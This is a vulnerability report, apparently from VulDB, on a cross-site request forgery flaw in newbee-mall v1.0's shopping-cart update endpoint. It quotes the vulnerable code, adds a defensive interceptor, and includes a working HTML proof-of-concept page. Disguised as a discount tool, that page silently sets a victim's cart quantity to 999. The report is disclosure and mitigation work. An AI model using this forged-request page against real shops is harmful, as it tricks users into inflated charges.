| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Shopping Cart Item Update
## Summary
A **CSRF vulnerability** exists in the shopping cart update endpoint `/shop-cart` (PUT). An attacker who lures a logged-in user onto a page they control can change the quantity of items in that user's cart, inflating the value of the order the user goes on to place.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java` (excerpt; the only interceptor registered for the cart routes is the login check)
```java
import ltd.newbee.mall.interceptor.NewBeeMallLoginInterceptor;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor;

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF protection: the interceptor only checks for a login session,
        //    there is no token check and no Origin/Referer check
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 78-91)
```java
@PutMapping("/shop-cart")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Any request that arrives with the victim's session cookie, whatever page
    //    sent it, can change the quantity of one of the victim's cart items
    String updateResult = newBeeMallShoppingCartService.updateNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(updateResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(updateResult);
}
```
**Security Issues**:
1. ❌ No CSRF token validation, and no `Origin`/`Referer` check on a state-changing request
2. ⚠️ A forged request can set an arbitrary `goodsCount` for a cart item
3. ⚠️ The victim checks out with inflated quantities and an inflated order value
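As an added example (not newbee-mall's own code, and not part of the original report), the following Spring `HandlerInterceptor` closes the gap shown in both snippets above: it rejects state-changing requests under `/shop-cart/**` whose `Origin` (or `Referer`) is not one of the site's own origins, and requires a synchronizer token bound to the victim's session that an attacker page cannot read. It assumes Spring Boot 2.x with `javax.servlet`, as newbee-mall v1.0 uses; the class name `CsrfInterceptor`, the session attribute `csrfToken`, the header name `X-CSRF-TOKEN` and the allowed-origin list are assumptions.

```java
// Added example, not newbee-mall project code. Assumes Spring Boot 2.x / javax.servlet.
// CsrfInterceptor, "csrfToken" and "X-CSRF-TOKEN" are hypothetical names.
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;

public class CsrfInterceptor implements HandlerInterceptor {

    public static final String TOKEN_SESSION_KEY = "csrfToken";
    public static final String TOKEN_HEADER = "X-CSRF-TOKEN";
    private static final Set<String> SAFE_METHODS =
            new HashSet<>(Arrays.asList("GET", "HEAD", "OPTIONS", "TRACE"));
    private static final SecureRandom RNG = new SecureRandom();

    // Origins allowed to issue state-changing requests, e.g. "http://localhost:28089" (assumed).
    private final Set<String> allowedOrigins;

    public CsrfInterceptor(Set<String> allowedOrigins) {
        this.allowedOrigins = new HashSet<>(allowedOrigins);
    }

    /** Session-bound token; a page template embeds it (e.g. in a meta tag) and the
     *  front-end sends it back in X-CSRF-TOKEN with every PUT/POST/DELETE. */
    public static String tokenFor(HttpSession session) {
        synchronized (session) {
            String token = (String) session.getAttribute(TOKEN_SESSION_KEY);
            if (token == null) {
                byte[] raw = new byte[32];
                RNG.nextBytes(raw);
                token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
                session.setAttribute(TOKEN_SESSION_KEY, token);
            }
            return token;
        }
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response,
                             Object handler) throws Exception {
        if (SAFE_METHODS.contains(request.getMethod().toUpperCase())) {
            return true; // reads do not change state; the forged PUT is what must be blocked
        }
        // Layer 1: source check. Browsers set Origin on every cross-site PUT/POST/DELETE,
        // so a write with neither Origin nor Referer is treated as hostile (fail closed).
        if (!isTrustedSource(request.getHeader("Origin"), request.getHeader("Referer"))) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
            return false;
        }
        // Layer 2: synchronizer token. An attacker page cannot read the victim's session
        // token, so a forged request cannot present it.
        HttpSession session = request.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_SESSION_KEY);
        String presented = request.getHeader(TOKEN_HEADER);
        if (expected == null || presented == null || !constantTimeEquals(expected, presented)) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }

    boolean isTrustedSource(String origin, String referer) {
        String source = origin != null ? origin : referer;
        if (source == null) {
            return false;
        }
        for (String allowed : allowedOrigins) {
            // Exact origin match, or a Referer URL that starts with the origin plus "/"
            // (the "/" stops http://localhost:28089.evil.example from matching).
            if (source.equals(allowed) || source.startsWith(allowed + "/")) {
                return true;
            }
        }
        return false;
    }

    private static boolean constantTimeEquals(String a, String b) {
        return MessageDigest.isEqual(a.getBytes(StandardCharsets.UTF_8),
                                     b.getBytes(StandardCharsets.UTF_8));
    }
}
```

Register it next to the login interceptor in `addInterceptors`, for example `registry.addInterceptor(new CsrfInterceptor(Collections.singleton("http://localhost:28089"))).addPathPatterns("/shop-cart/**");`, and have the cart page expose `CsrfInterceptor.tokenFor(session)` to the front-end JavaScript that issues the `PUT`. The `Origin` check alone stops the PoC below; the token is the layer that does not depend on browser header behaviour or on the deployment's CORS configuration. A project that already uses Spring Security gets the same protection from its built-in `CsrfFilter`; the configuration shown on this page handles login with a custom interceptor instead, which is why a hand-rolled check is shown here.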
## Proof of Concept (PoC)
An attacker-controlled page. A victim who is logged in to the shop and opens it has the quantity of cart item 1 rewritten under their own session cookie:
```html
<!DOCTYPE html>
<html>
<head>
  <title>Cart Optimization</title>
</head>
<body>
  <h2>Optimizing your shopping cart...</h2>
  <p>Please wait while we apply discounts.</p>
  <script>
    // Rewrite the quantity of one cart item (cartItemId 1) to 999 using the
    // victim's session cookie; the request carries no CSRF token.
    fetch('http://localhost:28089/shop-cart', {
      method: 'PUT',
      credentials: 'include',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        cartItemId: 1,    // target cart item
        goodsCount: 999,  // inflated quantity
        goodsId: 10001
      })
    })
    .then(response => response.json())
    .then(data => {
      document.body.innerHTML = '<h3>✅ Cart optimized!</h3>';
    })
    .catch(err => console.error('request blocked or failed', err));
  </script>
</body>
</html>
```
Two conditions outside the endpoint decide whether this page works cross-site. `PUT` with `Content-Type: application/json` is not a CORS "simple request", so the browser sends an `OPTIONS` preflight first and only issues the `PUT` if the server answers with `Access-Control-Allow-Origin` set to the attacker's origin and `Access-Control-Allow-Credentials: true`; the report does not show such a CORS configuration. Browsers that treat cookies without a `SameSite` attribute as `Lax` also withhold the session cookie on a cross-site `PUT`. Where either condition applies the forged request never reaches the controller, even though the controller itself performs no CSRF check; with a permissive CORS policy, or from a page on the shop's own origin, it does.
## Impact
**Shopping cart manipulation leading to inflated charges** - users may unknowingly check out with drastically increased item quantities, resulting in unexpectedly high charges.
---
**CVSS Score**: 7.1 (High)
|
|---|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/111 |
|---|
| User | flashzyc (UID 92850) |
|---|
| Submitted | 2026-02-05 11:55 (4 months ago) |
|---|
| Moderated | 2026-02-18 07:56 (13 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB Entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross-Site Request Forgery] |
|---|
| Points | 0 |
|---|